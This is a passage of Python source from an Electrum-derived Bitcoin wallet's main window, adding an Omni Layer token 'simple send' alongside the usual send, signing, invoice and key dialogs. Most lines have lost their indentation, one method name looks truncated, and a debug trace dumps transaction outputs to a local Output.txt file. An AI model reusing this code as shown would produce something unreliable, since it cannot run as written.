        # Here is where we build the Omni Layer "simple send" payload for an OP_RETURN output.
        op_return = '6a14'      # OP_RETURN opcode (0x6a) followed by a push of 0x14 = 20 bytes
        omni = '6f6d6e69'       # 'omni' class C marker (4 bytes)
        snum_txid = '00000000'  # transaction version (0) + transaction type (0 = simple send), 2 bytes each
        simple_send = '0000'    # high two bytes of the 4-byte property id (only ids below 65536 are supported here)
        amount = int(self.amount_e.get_amount())
        hex_amount = str(format(amount, '016x'))     # token amount, 8 bytes, big-endian hex
        propertyId = int(self.amount_e1.get_amount())
        hex_propId = str(format(propertyId, '04x'))  # low two bytes of the property id
        payload = op_return + omni + snum_txid + simple_send + hex_propId + hex_amount
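        # Illustrative example (hypothetical values): sending 1.0 of property id 31
        # (100000000 base units) yields
        #   payload = '6a14' + '6f6d6e69' + '00000000' + '0000' + '001f' + '0000000005f5e100'
        # i.e. OP_RETURN carrying "omni" + version 0 + type 0 (simple send)
        # + property id 31 + amount 0x05f5e100.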
# text_file = open("Output.txt", "w")
# text_file.write("payload: %s" % payload)
# text_file.close()
outputs.append(TxOutput(TYPE_SCRIPT, payload, 0))
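        # Debug trace: dump the constructed outputs to Output.txt in the working
        # directory while they are validated below.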
text_file = open("Output.txt", "w")
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
text_file.write("address: %s" % o.address)
text_file.write("type: %s" % o.type)
text_file.write("value: %s" % o.value)
text_file.close()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def _tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
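        # wallet.relayfee() is the minimum relay fee in sat per kilobyte; scaling it
        # by the estimated size (in bytes) gives the minimum absolute fee the server
        # is expected to accept for this transaction.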
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
def do_send_omni_tokens(self, preview = False):
# if run_hook('abort_send', self):
# return
r = self.read_send_omni_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
        # NOTE: output order matters for the Omni Layer protocol (the sender must be the first output, the recipient the second one)
tx.set_inverse_outputs()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def spend_coins_for_omni(self, coins):
self.set_pay_from(coins)
self.show_send_omni_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
            with open(fn, 'wb') as f:
                f.write(pr.raw)
            self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
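# Shown by do_sign() below when the entered address type does not correspond to a
# single public key (e.g. multisig/p2sh addresses), so message signing is not possible.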
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
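# Verify a message signature. The signature field is expected to hold a
# base64-encoded signature, as produced by do_sign() above.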
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
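# Encrypt/decrypt dialog: messages are encrypted to a public key via
# ECPubkey.encrypt_message(); decryption requires the wallet password and
# runs on the wallet thread.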
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
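# Raw transactions scanned from QR codes are base43-encoded rather than hex
# (base43 fits the QR alphanumeric character set, yielding smaller codes);
# decode back to hex before parsing.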
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
